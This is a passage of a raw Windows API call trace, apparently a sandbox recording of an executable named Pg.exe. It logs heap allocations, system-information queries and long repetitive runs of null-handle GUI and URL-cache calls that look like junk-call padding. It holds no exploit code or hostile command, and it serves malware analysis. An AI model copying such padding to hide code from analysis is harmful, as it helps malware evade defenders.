(HeapHandle=0x5e0000, Flags=0x8, Size=0x36) returned 0x604078 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x48) returned 0x5f8198 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x52) returned 0x5f4fb0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x3c) returned 0x5f1c48 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xd6) returned 0x5efca0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2e) returned 0x5f3190 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1e) returned 0x601908 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2c) returned 0x5f2d30 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x50) returned 0x5fbeb0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4e) returned 0x5ee068 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x5faf18 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x42) returned 0x5f8468 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x20) returned 0x6017f0 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x38) returned 0x603f38 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x24) returned 0x5fb158 [0181.114] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x609af0 | out: hHeap=0x5e0000) returned 1 [0181.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x800) returned 0x606e40 [0181.115] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0181.115] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4089b3) returned 0x0 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x5fbb50 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x5fbad0 [0181.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fbb50 | out: hHeap=0x5e0000) returned 1 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606710 [0181.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fbad0 | out: hHeap=0x5e0000) returned 1 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x606758 [0181.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606710 | out: hHeap=0x5e0000) returned 1 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc0f8 [0181.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606758 | out: hHeap=0x5e0000) returned 1 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x5fb0c8 [0181.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc0f8 | out: hHeap=0x5e0000) returned 1 [0181.115] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x603a38 [0181.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fb0c8 | out: hHeap=0x5e0000) returned 1 [0181.115] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Pg.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0181.115] GetSystemInfo (in: lpSystemInfo=0x19fa94 | out: lpSystemInfo=0x19fa94*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0181.116] GetTickCount () returned 0x2aea5 [0181.116] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc018 [0181.116] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6018e0 [0181.116] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0181.116] GetWindowRect (in: hWnd=0x0, lpRect=0x19f880 | out: lpRect=0x19f880) returned 0 [0181.116] SendMessageA (hWnd=0x0, Msg=0x1328, wParam=0x0, lParam=0x19f880) returned 0x0 [0181.116] InflateRect (in: lprc=0x19f880, dx=1, dy=1 | out: lprc=0x19f880) returned 1 [0181.116] InflateRect (in: lprc=0x19f880, dx=1, dy=1 | out: lprc=0x19f880) returned 1 [0181.116] SendMessageA (hWnd=0x0, Msg=0x1304, wParam=0x0, lParam=0x0) returned 0x0 [0181.116] SendMessageA (hWnd=0x0, Msg=0x130a, wParam=0xffffffff, lParam=0x19f880) returned 0x0 [0181.116] GetSysColorBrush (nIndex=15) returned 0x100072 [0181.116] FillRect (hDC=0xef, lprc=0x19f880, hbr=0x100072) returned 0 [0181.173] DeregisterEventSource (hEventLog=0x0) returned 0 [0181.173] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0181.253] GetLastError () returned 0x6 [0181.253] InvalidateRect (hWnd=0x0, lpRect=0x0, bErase=1) returned 1 [0181.264] ADsDecodeBinaryData (szSrcData=0x0, ppbDestData=0x19f8a4, pdwDestLen=0x19f890) returned 0x80004005 [0181.264] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.307] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] OleTranslateColor () returned 0x0 [0181.308] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6068f0 [0181.308] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606740 [0181.356] AdsTypeToPropVariant (pAdsValues=0x0, dwNumValues=0x0, pVariant=0x19f8b8) returned 0x0 [0181.357] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067e8 [0181.357] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606938 [0181.357] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606740 | out: hHeap=0x5e0000) returned 1 [0181.357] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067e8 | out: hHeap=0x5e0000) returned 1 [0181.357] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606938 | out: hHeap=0x5e0000) returned 1 [0181.357] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6068f0 | out: hHeap=0x5e0000) returned 1 [0181.357] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x6040f8 [0181.357] WSALookupServiceNextW (in: hLookup=0x0, dwControlFlags=0xfffffffb, lpdwBufferLength=0x19fa98, lpqsResults=0x0 | out: lpdwBufferLength=0x19fa98, lpqsResults=0x0) returned -1 [0181.357] WSALookupServiceEnd (hLookup=0x0) returned -1 [0181.358] CoCreateInstance (in: rclsid=0x422870*(Data1=0x2df01, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x0, riid=0x422860*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19fa9c | out: ppv=0x19fa9c*=0x0) returned 0x800401f0 [0181.358] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x782) returned 0x0 [0181.714] BeginPaint (in: hWnd=0x0, lpPaint=0x42eb68 | out: lpPaint=0x42eb68) returned 0x0 [0181.714] GetClientRect (in: hWnd=0x0, lpRect=0x19fa8c | out: lpRect=0x19fa8c) returned 0 [0181.714] GetClientRect (in: hWnd=0x0, lpRect=0x19fa5c | out: lpRect=0x19fa5c) returned 0 [0181.714] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="alerts") returned 0x250 [0181.714] AuthzInitializeResourceManager (in: Flags=0x1, pfnDynamicAccessCheck=0x0, pfnComputeDynamicGroups=0x0, pfnFreeDynamicGroups=0x0, szResourceManagerName=0x0, phAuthzResourceManager=0x19e120 | out: phAuthzResourceManager=0x19e120) returned 1 [0181.714] GetCursorPos (in: lpPoint=0x19e148 | out: lpPoint=0x19e148*(x=1053, y=121)) returned 1 [0181.715] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x910a066d [0181.715] GetCursorPos (in: lpPoint=0x19e170 | out: lpPoint=0x19e170*(x=1053, y=121)) returned 1 [0181.715] IntersectRect (in: lprcDst=0x19e158, lprcSrc1=0x19e19c, lprcSrc2=0x19e1d4 | out: lprcDst=0x19e158) returned 0 [0181.715] GetLastError () returned 0x0 [0181.715] SetLastError (dwErrCode=0x0) [0181.715] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0xbb7) returned 0x102 [0184.724] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x190a05f2 [0184.724] GetCursorPos (in: lpPoint=0x19e170 | out: lpPoint=0x19e170*(x=1053, y=121)) returned 1 [0184.724] IntersectRect (in: lprcDst=0x19e158, lprcSrc1=0x19e19c, lprcSrc2=0x19e1d4 | out: lprcDst=0x19e158) returned 0 [0184.724] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc2d8 [0184.724] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc318 [0184.724] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5fc358 [0184.724] lstrlenA (lpString="") returned 0 [0184.724] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.724] lstrlenA (lpString="") returned 0 [0184.724] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.725] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.725] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] lstrlenA (lpString="") returned 0 [0184.726] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x19e128 | out: psizl=0x19e128) returned 1 [0184.726] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc318 | out: hHeap=0x5e0000) returned 1 [0184.726] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc358 | out: hHeap=0x5e0000) returned 1 [0184.726] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fc2d8 | out: hHeap=0x5e0000) returned 1 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.726] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.727] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.727] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.727] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.727] GetObjectA (in: h=0x0, c=24, pv=0x19e19c | out: pv=0x19e19c) returned 0 [0184.727] CreateRectRgn (x1=3682552, y1=239, x2=0, y2=12582912) returned 0x1e04060d [0184.727] CombineRgn (hrgnDst=0x1e04060d, hrgnSrc1=0x1e04060d, hrgnSrc2=0x0, iMode=1) returned 0 [0184.740] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.648] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.648] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.651] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.651] GetUserDefaultLangID () returned 0x409 [0185.651] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.651] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.652] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.652] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.652] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.652] GetUserDefaultLangID () returned 0x409 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.652] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.652] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.652] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.652] GetUserDefaultLangID () returned 0x409 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.652] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.652] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.652] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.652] GetUserDefaultLangID () returned 0x409 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.652] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.652] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.652] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.652] GetUserDefaultLangID () returned 0x409 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.652] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.652] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.652] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.652] GetUserDefaultLangID () returned 0x409 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.652] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.652] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.652] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.652] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.653] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.653] 